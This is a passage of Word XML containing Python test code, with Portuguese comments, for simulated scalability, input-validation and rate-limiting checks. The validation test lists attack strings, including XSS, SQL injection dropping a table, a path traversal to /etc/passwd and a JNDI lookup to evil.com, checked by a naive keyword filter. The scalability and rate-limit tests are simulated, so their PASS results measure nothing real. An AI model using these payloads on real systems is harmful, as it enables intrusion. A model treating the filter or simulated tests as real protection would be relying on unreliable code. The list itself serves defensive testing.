      </w:r>
    </w:p>
    <w:p w14:paraId="1E06808A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7DE7C0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular teste de escalabilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B30A4BD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            agent_counts = [1, 5, 10, 20, 50]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CC765" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            response_times = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EA3446" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E43F52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            for agent_count in agent_counts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DD0C1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Simular criação de agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1E5D25" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                agent_start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E836E6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                await asyncio.sleep(0.001 * agent_count)  # Simular criação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8EE2F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                agent_duration = time.time() - agent_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA59CD4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                response_times.append(agent_duration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7E6A54" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C1CEE9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Calcular métricas de escalabilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102BBBE8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            scalability_factor = response_times[-1] / response_times[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D45F1C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0651BF58" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0926445A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C18D8B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E7173" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="scalability_test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7692E625" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94216F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D3A1A0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EC4C2C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "agent_counts": agent_counts,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5232EDAE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "response_times": response_times,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D500CF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "scalability_factor": scalability_factor,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348CBB73" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "linear_scaling": scalability_factor &lt; len(agent_counts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FFF1BD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E993AA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D2967C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3CF97" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449FA4B4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E66DB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3CB4C0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF17BE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="scalability_test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096EC6BE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CB1E05" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B8C19" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A4C4F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E5980" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C73D0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913FD7B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="2EF02888" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class SecurityTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4FC2DF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Testa segurança do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F3BA34" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753B4AE2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB4B2D0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753CD95C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B8BBE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_input_validation(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADCD276" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa validação de entrada"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1482DBED" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3BCB84" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB7E8A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E324A14" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Testes de validação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50A1DA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            malicious_inputs = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625E1810" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "&lt;script&gt;alert('xss')&lt;/script&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDFEEB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "'; DROP TABLE users; --",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB966CB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "../../../etc/passwd",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A96964" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "{{7*7}}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CED87" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "${jndi:ldap://evil.com/a}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487149D4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A3889" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C7B68A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            blocked_inputs = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B28CA5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA7ED7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            for malicious_input in malicious_inputs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70E356" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Simular validação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CE1CED" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                if any(pattern in malicious_input.lower() for pattern in ['script', 'drop', '..', '{{', '${']):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3938A343" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    blocked_inputs += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC2239" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3419B93A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            success_rate = blocked_inputs / len(malicious_inputs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3BBB6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A52690" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC515F1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E777CB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB9E41" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="input_validation",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192318F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS" if success_rate &gt;= 0.8 else "FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72810D7F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEFBE91" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E9D37" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "total_tests": len(malicious_inputs),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099206F9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "blocked_inputs": blocked_inputs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42223694" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "success_rate": success_rate,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594A77B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "security_level": "HIGH" if success_rate &gt;= 0.9 else "MEDIUM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E9D9C0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005359D8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA64B3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE5E777" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEDB088" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A1777" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8303B4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931D134" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="input_validation",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733964D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119DCB8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78354307" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E59489F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3243D6F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9A0449" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A366D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC5B55" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_rate_limiting(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C38ABF0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa rate limiting"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052901CA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11364F91" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B973574" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EAA3CB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular teste de rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A77F1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            requests_blocked = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F8202F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            total_requests = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F7776E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAD6DF6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            for i in range(total_requests):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17603649" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Simular request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F3FAC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                if i &gt; 50:  # Simular rate limit após 50 requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A8952" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    requests_blocked += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42CE7B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F8074C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            blocking_rate = requests_blocked / total_requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CB471" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E337FB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7655D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452857B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B99A10" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="rate_limiting",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66583373" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS" if blocking_rate &gt; 0.3 else "FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAA23C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEC15E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D30BA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "total_requests": total_requests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C339E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "blocked_requests": requests_blocked,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190D65D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "blocking_rate": blocking_rate,</w:t>
      </w:r>
    </w:p>
